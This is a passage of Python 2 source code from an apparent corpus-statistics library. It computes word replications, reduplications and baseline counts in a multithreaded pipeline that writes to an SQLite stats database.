search_pattern = u"{}='{}'".format(col_name,token) if syntagma_type == "lexem" and not stemmed_search else u'json_extract("{}", "$[{}]") = "{}"'.format(col_name,word_index,token)
#search_pattern = u"='{}'".format(token) if syntagma_type == "lexem" else u"LIKE '%{}%'".format(token)
where.append(search_pattern)
if additional_pos_where and syntagma_type!="pos":
col_name = u"{}{}".format("context_infoR",i-token_index)
search_pattern = u'json_extract("{}", "$[0]") = "{}"'.format(col_name,additional_pos_where[i])
where.append(search_pattern)
if sentiment:
where.append(u"polarity LIKE '%{}%'".format(sentiment))
yield where
return
else:
if syntagma_type == "pos":
#p((inp_syntagma_splitted, inp_syntagma_unsplitted))
self.logger.error("To get Where Expression without context for SyntagmaType='pos' is not possible. ")
#return False
#yield False
return
syntagma_tag ='stemmed' if stemmed_search else "syntagma"
syntagma_qeary = u"{}= '{}'".format(syntagma_tag,inp_syntagma_unsplitted)
#p([syntagma_qeary], "[syntagma_qeary]")
#return [syntagma_qeary]
yield syntagma_qeary
return
except (UnicodeDecodeError, UnicodeEncodeError):
convert = True
def _is_syntagma_scope_right(self, scope_num):
#self._context_left
#self._context_lenght
if scope_num > self._avaliable_scope:
#self.logger.error("")
return False
else:
return True
def _preprocess_syntagma(self, inp_syntagma,thread_name="Thread0", syntagma_type="lexem",stemmed_search=False):
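# Normalizes an input syntagma before querying: decodes the tokens to unicode if
# possible, verifies that a list/tuple was given, and for lexem syntagmas
# lowercases (when case-insensitive), strips letter repetitions via the RLE
# preprocessor and optionally stems each token.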
#p(inp_syntagma,"inp_syntagma")
#p((inp_syntagma), "11")
try:
inp_syntagma = [token.decode("utf-8") for token in inp_syntagma]
except:
pass
#p((inp_syntagma), "22")
if not isinstance(inp_syntagma, (list,tuple)):
self.logger.error("Given inp_syntagma ('{}') is from an un-support type ('{}')".format(inp_syntagma, type(inp_syntagma)))
return False
if syntagma_type == "lexem":
#p((self._case_sensitiv),"self._case_sensitiv")
if not self._case_sensitiv:
inp_syntagma = [token.lower() for token in inp_syntagma]
inp_syntagma = [self.preprocessors[thread_name]["rle"].del_rep(token) for token in inp_syntagma]
#p((inp_syntagma))
if stemmed_search:
inp_syntagma = [self.stemm(word) for word in inp_syntagma]
return inp_syntagma
#p(inp_syntagma,"inp_syntagma")
#if not self._case_sensitiv:
# inp_syntagma = [token.lower() for token in inp_syntagma]
def _check_settings_for_force_cleaning(self):
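# Compares the cleaning flags stored with the corpus against the ignore-settings
# of this Stats instance. A corpus that was stored lower-cased cannot be used
# case-sensitively; any additional ignore flag (URLs, punctuation, numbers,
# mentions, hashtags) forces the "force_cleaning" attribute of the StatsDB to
# True, otherwise it is reset to False.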
temp_force_cleaning = False
if self._corp_info["case_sensitiv"] is True and self._case_sensitiv is False:
temp_force_cleaning = True
elif self._corp_info["case_sensitiv"] is False and self._case_sensitiv is True:
self.logger.error("Current CorpDB was lower_cased. And StatdDB was initialized with sensitive case. Because tt is not possible any more to reconstruct the case back, this operation is illegal. Please change setting and try one more time.")
return False
if self._corp_info["del_url"] is False and self._ignore_url is True:
temp_force_cleaning = True
if self._corp_info["del_punkt"] is False and self._ignore_punkt is True:
temp_force_cleaning = True
if self._corp_info["del_num"] is False and self._ignore_num is True:
temp_force_cleaning = True
if self._corp_info["del_mention"] is False and self._ignore_mention is True:
temp_force_cleaning = True
if self._corp_info["del_hashtag"] is False and self._ignore_hashtag is True:
temp_force_cleaning = True
if temp_force_cleaning:
self.statsdb.update_attr("force_cleaning", True)
self.set_all_intern_attributes_from_db()
if self._force_cleaning is not True:
self.logger.error("Force_cleaning-Option wasn't activated.")
return False
else:
self.statsdb.update_attr("force_cleaning", False)
self.set_all_intern_attributes_from_db()
return True
###########################Setters####################
#_drop_created_indexes
def compute(self,inp_corp, stream_number=1, datatyp="dict",
adjust_to_cpu=True,min_files_pro_stream=1000,cpu_percent_to_get=50,
thread_name="Thread0", create_indexes=True, freeze_db=False,
drop_indexes=True,optimized_for_long_syntagmas=True,
baseline_insertion_border=1000000):
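# Main computation entry point: locks the StatsDB, copies corpus metadata
# (language, taggers, corpus id) into it, optionally drops existing indexes,
# splits the corpus into streams and starts one worker thread per stream plus a
# single DB-writer thread. After all workers finish it flushes the caches,
# optionally creates indexes, checks baseline/StatsDB consistency, optionally
# freezes (size-optimizes) the DB and finally unlocks it.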
if not self._check_stats_db_should_exist():
return False
#p(stream_number, "stream_number")
if not self._check_db_should_be_an_stats():
return False
#self._baseline_intime_insertion_till = baseline_intime_insertion_till
#try:
if not isinstance(inp_corp, Corpus):
self.logger.error("Given InpObject is not from Corpus type. Insert was aborted!")
return False
if self.statsdb.get_attr("locked"):
self.logger.error("Current DB is still be locked. Possibly it in ht now fr in-useom other process or la thest computation process is failed.")
return False
self.statsdb.update_attr("locked", True)
self._init_compution_variables()
if self._db_frozen: ## insert "db_frozen" as attribute to the StatsDB!!!
msg = "Current StatsDB is closed for new Insertions because it was already SizeOptimized and all temporary Data was deleted"
self.logger.error(msg)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
self._terminated.value = True
return False
if drop_indexes:
self._drop_created_indexes()
self._init_compution_variables()
self.corp = inp_corp
self._corp_info = self.corp.info()
self._text_field_name = self._corp_info["text_field_name"]
self._id_field_name = self._corp_info["id_field_name"]
self.statsdb.update_attr("pos_tagger",self._corp_info["pos_tagger"])
self.statsdb.update_attr("sentiment_analyzer",self._corp_info["sentiment_analyzer"])
self._pos_tagger = self._corp_info["pos_tagger"]
self._sentiment_analyzer = self._corp_info["sentiment_analyzer"]
self._compute_cleaning_flags()
#p(self.force_cleaning_flags, "self.force_cleaning_flags")
#p(self._force_cleaning, "self._force_cleaning")
if not self._check_settings_for_force_cleaning():
return False
#p(self._force_cleaning, "self._force_cleaning")
if not self._language:
self.statsdb.update_attr("language",self._corp_info["language"])
else:
if self._language != self._corp_info["language"]:
self.logger.error("StatsDB language ('{}') is not equal to the inserting CorpDB ('{}'). Those meta data should be equal for staring the insertion process. Please select other corpus, which you want to insert to the current statsDB or initialize a new StatsDB with right language.".format(self._language, self._corp_info["language"]))
return False
#p(self._corpus_id, "self._corpus_id")
if not self._corpus_id:
self.statsdb.update_attr("corpus_id", self._corp_info["id"])
self.set_all_intern_attributes_from_db()
else:
if self._corpus_id != self._corp_info["id"]:
self.logger.error("Current StatdDb was already computed/initialized for Corpus with id '{}'. Now you try to insert Corpus with id '{}' and it is not allow.".format(self._corpus_id,self._corp_info["id"]))
#p(self._corpus_id, "self._corpus_id")
self._init_stemmer(self._corp_info["language"])
#self.status_bars_manager = self._get_status_bars_manager()
##### Status-Bar - Name of the processed DB
if self._status_bar:
# print "\n"
if self._in_memory:
dbname = ":::IN-MEMORY-DB:::"
else:
dbname = '{}'.format(self.statsdb.fname())
status_bar_starting_corpus_insertion = self._get_new_status_bar(None, self.status_bars_manager.term.center( dbname) , "", counter_format=self.status_bars_manager.term.bold_white_on_blue("{fill}{desc}{fill}"))
status_bar_starting_corpus_insertion.refresh()
if adjust_to_cpu:
stream_number= get_number_of_streams_adjust_cpu( min_files_pro_stream, inp_corp.corpdb.rownum("documents"), stream_number, cpu_percent_to_get=cpu_percent_to_get)
if stream_number is None or stream_number==0:
#p((self._get_number_of_left_over_files(),self.counter_lazy_getted),"self._get_number_of_left_over_files()")
self.logger.error("Number of input files is 0. Not generators could be returned.", exc_info=self._logger_traceback)
return []
streams= self.get_streams_from_corpus(inp_corp, stream_number, datatyp=datatyp)
#p(streams, "streams")
## threads
if self._status_bar:
status_bar_threads_init = self._get_new_status_bar(len(streams), "ThreadsStarted", "threads")
#p((stream_number, len(streams)))
#i=1
self._threads_num = len(streams)
if self._threads_num>1:
if self._status_bar:
unit = "rows"
self.main_status_bar_of_insertions = self._get_new_status_bar(0, "AllThreadsTotalInsertions", unit)
self.main_status_bar_of_insertions.refresh()
#self.main_status_bar_of_insertions.total = 0
else:
self.main_status_bar_of_insertions = False
#parent, child = Pipe()
db_writer_queue = Queue()
db_writer = threading.Thread(target=self._db_multiproc_writer, args=(db_writer_queue, stream_number), name=thread_name)
#db_writer = mp.Process(target=self._db_multiproc_writer, args=(db_writer_queue, stream_number), name=thread_name)
db_writer.setDaemon(True)
db_writer.start()
for stream in streams:
reciever = stream[2]
sender = stream[3]
thread_name = stream[0]
length = stream[1]
status_bar_insertion_in_the_current_thread = self._init_status_bar_for_current_thread( length, thread_name=thread_name, ) if self._status_bar else False
#processThread = threading.Thread(target=self._compute, args=(gen,status_bar_insertion_in_the_current_thread,datatyp, thread_name,baseline_insertion_border), name=thread_name)
#processThread = mp.Process(target=self._compute, args=(reciever,sender,db_writer_queue,status_bar_insertion_in_the_current_thread,datatyp, thread_name,baseline_insertion_border), name=thread_name)
processThread = threading.Thread(target=self._compute, args=(reciever,sender,db_writer_queue,status_bar_insertion_in_the_current_thread,datatyp, thread_name,baseline_insertion_border), name=thread_name)
processThread.daemon = True
processThread.start()
self.active_threads.append(processThread)
if self._status_bar:
status_bar_threads_init.update(incr=1)
#i+=1
time.sleep(1)
self.logger.info("'{}'-thread(s) was started. ".format(len(self.active_threads)))
time.sleep(3)
if not self._wait_till_all_threads_are_completed("Compute"):
return False
self._close_db_writer.value = True
db_writer.join()
#p("+++1111",c="m")
#p(self.statsdb._cashed_dict, "self.statsdb._cashed_dict")
self.statsdb._write_cashed_insertion_to_disc()
self.statsdb._commit(write_all_cash = True)
self.len_active_threads = len(self.active_threads)
del self.active_threads
self.active_threads = []
#db_writer.terminate()
del db_writer
gc.collect()
## save attributes from the main counter
if self._status_bar:
if self.main_status_bar_of_insertions:
self.counters_attrs["compute"]["start"] = self.main_status_bar_of_insertions.start
self.counters_attrs["compute"]["end"] = self.main_status_bar_of_insertions.last_update
self.counters_attrs["compute"]["total"] = self.main_status_bar_of_insertions.total
self.counters_attrs["compute"]["desc"] = self.main_status_bar_of_insertions.desc
else:
self.counters_attrs["compute"] = False
#p("2222",c="m")
#self._print_summary_status()
inserted_repl = self.statsdb.rownum("replications")
inserted_redu = self.statsdb.rownum("reduplications")
uniq_syntagma_in_baseline = self.statsdb.rownum("baseline")
if self._status_bar:
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("Repl:'{}'; Redu:'{}'; UniqSyntagmaBaseline: '{}'.".format(inserted_repl, inserted_redu,uniq_syntagma_in_baseline ) ), "", counter_format=self.status_bars_manager.term.bold_white_on_blue('{fill}{desc}{fill}\n'))
status_bar_total_summary.refresh()
self.status_bars_manager.stop()
#print "\n"
if not self._status_bar:
self.logger.info("Current StatsDB has '{}' rows in the Replications Table; '{}' rows in the Reduplications Table;'{}' rows in the Baseline Table; ".format(inserted_repl,inserted_redu,uniq_syntagma_in_baseline))
else:
self.logger.debug("Current StatsDB has '{}' rows in the Replications Table; '{}' rows in the Reduplications Table;'{}' rows in the Baseline Table; ".format(inserted_repl,inserted_redu,uniq_syntagma_in_baseline))
#self.logger.info("Current StatsDB has '{}' rows in the Reduplications Table.".format(inserted_redu))
#self.logger.info("Current StatsDB has '{}' rows in the Baseline Table.".format(uniq_syntagma_in_baseline))
self._last_insertion_was_successfull = True
self._end_time_of_the_last_insertion = time.time()
#p("333",c="m")
self.statsdb._commit(write_all_cash=True)
if create_indexes:
self.statsdb.init_default_indexes(thread_name=thread_name)
self.create_additional_indexes(optimized_for_long_syntagmas=optimized_for_long_syntagmas)
self.statsdb._commit(write_all_cash=True)
if not self._check_baseline_consistency():
self.logger.error("StatsDBCorrupt: Current StatsDB is inconsistent.")
return False
if freeze_db:
self.optimize_db(stream_number=stream_number, min_row_pro_sream=min_files_pro_stream)
self.statsdb._commit(write_all_cash=True)
self._compute_baseline_sum()
if not self._check_statsdb_consistency():
self.logger.error("StatsDBCorrupt: Current StatsDB is inconsistent.")
return False
#p("DONE---")
if len(self.threads_unsuccess_exit) >0:
self.logger.error("StatsComputational process is failed. (some thread end with error)")
raise ProcessError, "'{}'-Threads end with an Error.".format(len(self.threads_unsuccess_exit))
#self.statsdb.update_attr("locked", False)
return False
else:
self.logger.info("StatsComputational process end successful!!!")
self.statsdb.update_attr("locked", False)
self.statsdb._commit(write_all_cash=True)
return True
# except Exception as e:
# print_exc_plus() if self._ext_tb else ""
# self.logger.error("ComputeError: See Exception: '{}'. ".format(repr(e)), exc_info=self._logger_traceback)
# self.threads_status_bucket.put({"name":thread_name, "status":"failed"})
# except KeyboardInterrupt:
# self.logger.warning("KeyboardInterrupt: Process was stopped from User. Some inconsistence in the current DB may situated.")
# sys.exit()
def _compute(self, pipe_reciever, sender,db_writer,status_bar_insertion_in_the_current_thread,datatyp="dict", thread_name="Thread0", baseline_insertion_border=1000000,add_also_repeted_redu_to_baseline=True):
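# Per-stream worker: receives document elements over a pipe until a None marker
# arrives. For every document it optionally applies force-cleaning, extracts
# replications and reduplications, computes the baseline counts and stemmed
# tokens, and pushes the temporized rows to the shared DB-writer queue; at the
# end it sends the per-table terminating None markers to the writer.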
#try:
if not self._check_corp_should_exist():
self._terminated.value = True
msg = "StatsObj wasn't found."
self.logger.error(msg)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
return False
if not self._corp_info:
self._terminated.value = True
msg = "CorpInfo wasn't found."
self.logger.error(msg)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
return False
self._initialisation_computation_process(thread_name=thread_name)
#_init_status_bar_for_current_thread(pipe_reciever, thread_name="Thread0"):
#if self._status_bar:
# if not status_bar_insertion_in_the_current_thread: return False
self.logger.debug("_ComputationalProcess: Was started for '{}'-Thread. ".format(thread_name))
i = 0
#for doc_elem in pipe_reciever:
pipe_reciever.send("+")
while True:
#try:
#doc_elems = pipe_reciever.recv()
doc_elem = pipe_reciever.recv()
#p(doc_elem, "RECIEVER"+thread_name, )
#except IOError:
# break
if not doc_elem:
if doc_elem is False:
pipe_reciever.send("+")
continue
elif doc_elem is None:
sender.terminate()
del sender
pipe_reciever.close()
break
#doc_elem = pipe_reciever.recv()
else:
continue
#for doc_elem in doc_elems:
#for doc_elem in pipe_reciever:
self._check_termination(thread_name=thread_name)
i+= 1
#p(self._status_bar, "self._status_bar")
#p("INCR","STATUSBAR"+thread_name)
if self._status_bar:
status_bar_insertion_in_the_current_thread.update(incr=1)
status_bar_insertion_in_the_current_thread.refresh()
if self.main_status_bar_of_insertions:
self.main_status_bar_of_insertions.update(incr=1)
#self.main_status_bar_of_insertions.refresh()
text_elem = json.loads(doc_elem[1])
#p((sum([len(s[0]) for s in text_elem]), "doc_elem"))
if self._force_cleaning:
text_elem = self._preprocess(text_elem,thread_name=thread_name)
#p(text_elem, c="m")
### Extraction
extracted_repl_in_text_container, repl_free_text_container, rle_for_repl_in_text_container = self.extract_replications(text_elem, thread_name=thread_name)
#p((extracted_repl_in_text_container, repl_free_text_container, rle_for_repl_in_text_container), "REPLS")
extracted_redu_in_text_container, redu_free_text_container, mapping_redu = self.extract_reduplications(repl_free_text_container, rle_for_repl_in_text_container, thread_name=thread_name)
#p((extracted_redu_in_text_container, redu_free_text_container, mapping_redu), "REDUS")
computed_baseline = self.compute_baseline(redu_free_text_container,extracted_redu_in_text_container)
stemmed_text_container = [[self.stemm(token) for token in sent] for sent in redu_free_text_container]
#p(stemmed_text_container, "stemmed_text_container")
### Insertion
self.insert_repl_into_db(db_writer,doc_elem,text_elem,extracted_repl_in_text_container, repl_free_text_container,rle_for_repl_in_text_container,redu_free_text_container,mapping_redu,stemmed_text_container, thread_name=thread_name)
self.insert_redu_into_db(db_writer,doc_elem,text_elem,extracted_redu_in_text_container, redu_free_text_container, rle_for_repl_in_text_container, repl_free_text_container, mapping_redu,stemmed_text_container,thread_name=thread_name)
#if "@ronetejaye" in [t for sent in redu_free_text_container for t in sent]:
# p((doc_elem,redu_free_text_container,repl_free_text_container), "doc_elem")
#with self.locker:
self.baseline_lazyinsertion_into_db(db_writer,computed_baseline,extracted_redu_in_text_container,baseline_insertion_border=baseline_insertion_border,thread_name=thread_name)
self._send_data_to_dbwriter(db_writer,"replications",thread_name,NULL=True)
self._send_data_to_dbwriter(db_writer,"reduplications",thread_name,NULL=True)
self._send_data_to_dbwriter(db_writer,"baseline", thread_name,NULL=True)
if self._status_bar:
status_bar_insertion_in_the_current_thread.refresh()
self.counters_attrs["_compute"][thread_name]["start"] = status_bar_insertion_in_the_current_thread.start
self.counters_attrs["_compute"][thread_name]["end"] = status_bar_insertion_in_the_current_thread.last_update
self.counters_attrs["_compute"][thread_name]["total"] = status_bar_insertion_in_the_current_thread.total
self.counters_attrs["_compute"][thread_name]["desc"] = status_bar_insertion_in_the_current_thread.desc
status_bar_insertion_in_the_current_thread.close(clear=False)
#p("STOP", thread_name,c="r")
self.threads_status_bucket.put({"name":thread_name, "status":"done"})
#p("STOP", thread_name,c="r")
#self.threads_status_bucket.put("JUHUHUHU")
self.logger.debug("_Compute: '{}'-Thread is done and was stopped.".format(thread_name))
return True
# except Exception as e:
# print_exc_plus() if self._ext_tb else ""
# msg = "_ComputeError: See Exception: '{}'. ".format(repr(e))
# self.logger.error(msg, exc_info=self._logger_traceback)
# self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
# self.statsdb.rollback()
# return False
def _send_data_to_dbwriter(self,db_writer, table_name,thread_name,NULL=False):
if table_name == "reduplications":
db_writer.put(("reduplications",self.temporized_redu[thread_name] ,thread_name))
if NULL:
db_writer.put(("reduplications",None ,thread_name))
del self.temporized_redu[thread_name]
self.temporized_redu[thread_name] = []
elif table_name == "replications":
db_writer.put(("replications",self.temporized_repl[thread_name] ,thread_name))
if NULL:
db_writer.put(("replications",None ,thread_name))
del self.temporized_repl[thread_name]
self.temporized_repl[thread_name] = []
else:
db_writer.put(("baseline", self.temporized_baseline,thread_name))
if NULL:
db_writer.put(("baseline", None,thread_name))
del self.temporized_baseline
self.temporized_baseline= defaultdict(int)
#del data_to_send
gc.collect()
def _check_termination(self, thread_name="Thread0"):
if self._terminated.value:
self.logger.critical("'{}'-Thread was terminated.".format(thread_name))
self.threads_status_bucket.put({"name":thread_name, "status":"terminated"})
sys.exit()
def _db_multiproc_writer(self, active_queue,stream_number):
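# Single writer loop that drains the shared queue: an item is a
# (table_name, data, thread_name) tuple. Empty data counts as a "stream closed"
# marker for that table; otherwise the batch is written into the replications,
# reduplications or baseline table. The loop ends when the termination flag or
# the close flag is set.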
counter_closed = defaultdict(int)
#c = 0
#c1 = 0
while True:
if self._terminated.value:
break
#sys.exit()
#result = pipe.recv()
if active_queue.empty():
time.sleep(0.1)
if self._close_db_writer.value:
break
continue
result = active_queue.get()
#if sum(counter_closed.values())/float(3) == float(stream_number):
# p(sum(counter_closed.values())/float(3))
# active_queue.close()
# break
data_to_write = result[1]
table_name = result[0]
thread_name = result[2]
#p((table_name, thread_name), "data_to_write",c="m")
if not data_to_write:
del result
#c1 += 1
counter_closed[table_name] += 1
#p(counter_closed, "counter_closed",c="r")
continue
if table_name == "replications":
#c+= 1
self._write_repl_into_db(data_to_write,thread_name=thread_name)
elif table_name == "reduplications":
#c+= 1
self._write_redu_into_db(data_to_write,thread_name=thread_name)
else:
#c+= 1
self._baseline_insert_temporized_data(data_to_write,thread_name=thread_name)
del result
del data_to_write
gc.collect()
#p((c,c1), "CCCC", c="r")
#p(counter_closed, "counter_closed",c="r")
sys.exit()
def _write_repl_into_db(self,data_to_write,thread_name="Thread0"):
#thread_name =
placeholders = ', '.join('?'*len(self._repls_cols))
query = "INSERT or IGNORE INTO main.replications VALUES ({});".format(placeholders)
#p((query,placeholders),"query")
#p(self.temporized_repl[thread_name][0])
#p(len(self.temporized_repl[thread_name][0]))
self.statsdb._threads_cursors[thread_name].executemany(query,data_to_write )
self.temporized_repl[thread_name] = []
def _write_redu_into_db(self,data_to_write,thread_name="Thread0"):
#thread_name =
placeholders = ', '.join('?'*len(self._redus_cols))
query = "INSERT or IGNORE INTO main.reduplications VALUES ({});".format(placeholders)
#p((query,placeholders),"query")
#p(self.temporized_redu[thread_name][0])
#p(len(self.temporized_redu[thread_name][0]))
self.statsdb._threads_cursors[thread_name].executemany(query,data_to_write )
self.temporized_redu[thread_name] = []
def _baseline_insert_temporized_data(self,temporized_baseline,thread_name="Thread0"):
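# Upserts the temporized baseline counts: INSERT OR REPLACE into the baseline
# table, where the running total "occur_syntagma_all" is the previously stored
# value (COALESCE to 0) plus the new count. Each generated row consists of the
# joined syntagma, its stemmed form, the scope and the count.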
try:
#self.logger.low_debug("Insertion Process of temporized Baseline was started")
qeary = """
INSERT OR REPLACE INTO baseline VALUES (
:0,
:1,
:2,
COALESCE((SELECT occur_syntagma_all FROM baseline WHERE syntagma=:0), 0) + :3,
NULL,NULL,NULL,NULL,NULL,NULL
);"""
cursor = self.statsdb._db.cursor()
def intern_gen():
for syntag, count in temporized_baseline.iteritems():
#print syntag
#self.logger.error("{}".format(syntag))
#sys.exit()
yield (
self._baseline_delimiter.join(syntag).strip(),
self._baseline_delimiter.join([self.stemm(w) for w in syntag]).strip(),
len(syntag),
count,
)
cursor.executemany(qeary, intern_gen() )
self.logger.low_debug("Temporized Baseline was inserted into DB.")
return True
except Exception as e:
self.logger.error("INsertionError: {}".format(repr(e)), exc_info=self._logger_traceback)
self._terminated.value = True
return False
def _get_occur(self,counted_rep, scope=1,splitted_syntagma=False):
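# Aggregates occurrence statistics from a counted nested dict. For scope > 1 the
# unique occurrences (number of doc/token positions) and the exhausted repetition
# sums are computed per word; if splitted_syntagma is given, the values are
# returned aligned with the syntagma words (a word that was already consumed is
# marked "IGNOR" instead of being counted twice). For scope == 1 a single
# (unique, exhausted) pair is returned.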
if scope>1:
#if
occur_uniq = defaultdict(lambda:0)
occur_rep_exhausted = defaultdict(lambda:0)
for word, word_data in counted_rep.iteritems():
for doc_id, doc_data in word_data.iteritems():
for rep_count in doc_data.values():
occur_uniq[word] += 1
occur_rep_exhausted[word] += rep_count
if splitted_syntagma:
occur_uniq_output = ()
occur_e_output = ()
#tuple(occur_uniq[word] for word in splitted_syntagma )
for word in splitted_syntagma:
occur_uniq_output += (occur_uniq[word],)
occur_uniq[word] = "IGNOR"
occur_e_output += (occur_rep_exhausted[word],)
occur_rep_exhausted[word] = "IGNOR"
return (occur_uniq_output,occur_e_output)
else:
return (sum(occur_uniq.values()),sum(occur_rep_exhausted.values()) )
else:
occur_uniq = 0
occur_rep_exhausted = 0
for doc_id, doc_data in counted_rep.iteritems():
for rep_count in doc_data.values():
occur_uniq += 1
occur_rep_exhausted += rep_count
return (occur_uniq,occur_rep_exhausted)
def _insert_temporized_sum_into_baseline_table_in_db(self,temporized_sum,tables_name, ):
placeholders = " ,".join(["?" for i in range(len(temporized_sum[0]))])
qeary = """
INSERT OR REPLACE INTO {} VALUES ({});
"""
self.statsdb._threads_cursors["sum_inserter"].executemany(qeary.format(tables_name,placeholders), temporized_sum)
def recompute_syntagma_repetativity_scope(self, full_repetativ_syntagma,_check_statsdb_consistency=True):
values_from_db = self.statsdb.get_attr("full_repetativ_syntagma")
if full_repetativ_syntagma not in [True, False]:
self.logger.error("A non-boolean symbol ('{}') was given as full_repetativ_syntagma-Option. ".format(full_repetativ_syntagma))
return False
if full_repetativ_syntagma == values_from_db:
self.logger.warning("There is nothing to recompute. Values for 'full_repetativ_syntagma' was given: '{}' and values in StatsDB is '{}'.".format(full_repetativ_syntagma, values_from_db))
return False
# if self._full_repetativ_syntagma and self._db_frozen and full_repetativ_syntagma == False:
# self.logger.warning("Recomputing from True->False is failed!!! Because this StatsDB was already optimized and all not-full-repetativ-syntagmas was already deleted during this process.")
# return False
if self.statsdb.get_attr("locked"):
self.logger.error("Current DB is still be locked. Possibly it in ht now fr in-useom other process or la thest computation process is failed.")
return False
self.statsdb.update_attr("locked", True)
self.statsdb.update_attr("full_repetativ_syntagma", full_repetativ_syntagma)
self.set_all_intern_attributes_from_db()
if self._compute_baseline_sum():
self.logger.info("StatsDB FullSyntagmaRepetativnes was recompute with success.")
if _check_statsdb_consistency:
if not self._check_baseline_consistency():
self.logger.error("StatsDBCorrupt: Current StatsDB is inconsistent.")
return False
if not self._check_statsdb_consistency():
self.logger.error("StatsDBCorrupt: Current StatsDB is inconsistent.")
return False
else:
self.logger.error("FullRepetativnes wasn't recompute.")
return False
self.statsdb.update_attr("locked", False)
return True
#self.statsdb.update_attr("full_repetativ_syntagma", full_repetativ_syntagma)
def _compute_baseline_sum(self, insertion_border=10000, thread_name="Thread0",size_to_fetch=10000, ):
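# Rebuilds the baseline table with summarized repetition statistics: a temporary
# "_baseline" table is created, every existing baseline row is re-queried against
# the replications and reduplications tables, the per-word occurrence counts and
# the "full syntagma" counts are appended to the first four baseline columns, the
# rows are bulk-inserted, and finally the old baseline table is dropped and the
# temporary one is renamed to "baseline".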
if not self._check_stats_db_should_exist():
return False
if self._status_bar:
try:
if not self.status_bars_manager.enabled:
self.status_bars_manager = self._get_status_bars_manager()
except:
self.status_bars_manager = self._get_status_bars_manager()
status_bar_start = self._get_new_status_bar(None, self.status_bars_manager.term.center("RepetitionSummarizing") , "", counter_format=self.status_bars_manager.term.bold_white_on_cyan("{fill}{desc}{fill}"))
status_bar_start.refresh()
status_bar_current = self._get_new_status_bar(self.statsdb.rownum("baseline"), "Processed:", "syntagma")
# ### compute syntagmas to delete
counter_summerized = 0
temporized_sum = []
temp_rep = defaultdict()
minimum_columns = False
syntagma_type = "lexem"
indexes = self.col_index_min if minimum_columns else self.col_index_orig
#### Compute indexes
ix_repl = indexes["repl"]
ix_redu = indexes["redu"]
ix_word_redu = ix_redu['normalized_word']
ix_word_repl = ix_repl['normalized_word']
ix_token_redu = ix_redu["index_in_corpus"]
ix_token_repl = ix_repl["index_in_corpus"]
ix_length_redu = ix_redu["redu_length"]
#ix_in_redu_repl = ix_repl["in_redu"]
ix_doc_id_redu = ix_redu["doc_id"]
ix_doc_id_repl = ix_repl["doc_id"]
row_num_bevore = self.statsdb.rownum("baseline") +1000
#for i, baseline_container in enumerate(self._baseline("*",max_scope=False, split_syntagma=False,thread_name="baseline_getter")):
#gen = self.statsdb.lazyget("baseline", thread_name="baseline_sum")
# def intern_gen():
# gen = self.statsdb._threads_cursors["baseline_getter"].execute("SELECT * FROM baseline;") #lazyget("baseline", thread_name="baseline_sum")
# while True:
# results = gen.fetchmany(size_to_fetch)
# results = list(results)
# if not results:
# break
# for row in results:
# yield row
### create_temp_table
#self.statsdb._threads_cursors["baseline_creater"].execute("CREATE TABLE 'temp_baseline' AS SELECT sql FROM sqlite_master WHERE type='table' AND name='baseline'" ).fetchall()
self.statsdb._commit(write_all_cash=True)
self._temp_baseline_name = "_baseline"
status = self.statsdb.addtable(self._temp_baseline_name, db_helper.default_columns_and_types_for_stats_baseline ,constraints= db_helper.default_constraints_for_stats_baseline)
self.statsdb._commit(write_all_cash=True)
for i, baseline_container in enumerate(self.statsdb.lazyget("baseline", thread_name="baseline_sum")):
if i >row_num_bevore:
self.logger.error("InvalidState: BaselineGetter send more items as need. Script is failed! ( Probably an ImplementationsError. Please contact Egor Savin: ego@savin.berlin) ")
sys.exit()
#return
#p(baseline_container, "baseline_container")
if self._status_bar:
status_bar_current.update(incr=1)
#inp_syntagma = self._preprocess_syntagma(inp_syntagma,thread_name=thread_name, syntagma_type=syntagma_type)
unsplitted_syntagma = baseline_container[0]
splitted_syntagma = unsplitted_syntagma.split(self._baseline_delimiter)
#p(baseline_container,"baseline_container")
scope = len(splitted_syntagma)
where = tuple(self._get_where_statement(splitted_syntagma,scope=scope,thread_name=thread_name,
with_context=True,syntagma_type="lexem"))#, splitted_syntagma=splitted_syntagma)
if not where: return False
repls_container = self.get_reps("repl",splitted_syntagma,scope,where,indexes,thread_name=thread_name,return_full_tuple=True,
delete_duplicates=False,syntagma_type=syntagma_type, minimum_columns=minimum_columns)
redus_container = self.get_reps("redu",splitted_syntagma,scope,where,indexes,thread_name=thread_name,return_full_tuple=True,
delete_duplicates=False,syntagma_type=syntagma_type, minimum_columns=minimum_columns)
temp_baseline_row = baseline_container[:4]
#p((repls_container, redus_container, temp_baseline_row))
if repls_container or redus_container:
counter_summerized += 1
occur_full_syn_repl = None
occur_full_syn_redu = None
if scope==1:
if repls_container:
repls =repls_container[0]
temp_repl = defaultdict(lambda:defaultdict(int))
for repl in repls:
temp_repl[repl[ix_doc_id_repl]][repl[ix_token_repl]] += 1
occur = self._get_occur(temp_repl)
temp_baseline_row += occur
occur_full_syn_repl = occur[0]
else:
temp_baseline_row += (None,None)
if redus_container:
redus = redus_container[0]
temp_redu = defaultdict(lambda:defaultdict(int))
for redu in redus:
temp_redu[redu[ix_doc_id_redu]][redu[ix_token_redu]] += redu[ix_length_redu]
occur = self._get_occur(temp_redu)
temp_baseline_row += occur
occur_full_syn_redu = occur[0]
else:
temp_baseline_row += (None,None)
temp_baseline_row += (occur_full_syn_repl,occur_full_syn_redu)
else:
occur_full_syn_repl = None
occur_full_syn_redu = None
#p((baseline_container[0],data),"data")
if repls_container:
repls =repls_container[0]
#p(repls_container, "repls_container")
counted_repls = defaultdict(lambda:defaultdict(lambda:defaultdict(int)))
for repl in repls:
#p(repl[3], "repl[3]")
counted_repls[repl[ix_word_repl]][repl[ix_doc_id_repl]][repl[ix_token_repl]] += 1 #. if not in_redu, that each repl will be counted
#p(counted_repls,"counted_repls")
temp_baseline_row += self._get_occur(counted_repls,scope=scope,splitted_syntagma=splitted_syntagma)
occur_full_syn_repl = repls_container[2] if repls_container[1] else None
else:
temp_baseline_row += (None,None)
if redus_container:
redus = redus_container[0]
counted_redus = defaultdict(lambda:defaultdict(lambda:defaultdict(int)))
for redu in redus:
counted_redus[redu[ix_word_redu]][redu[ix_doc_id_redu]][redu[ix_token_redu]] += redu[ix_length_redu]
#p(counted_redus, "counted_redus")
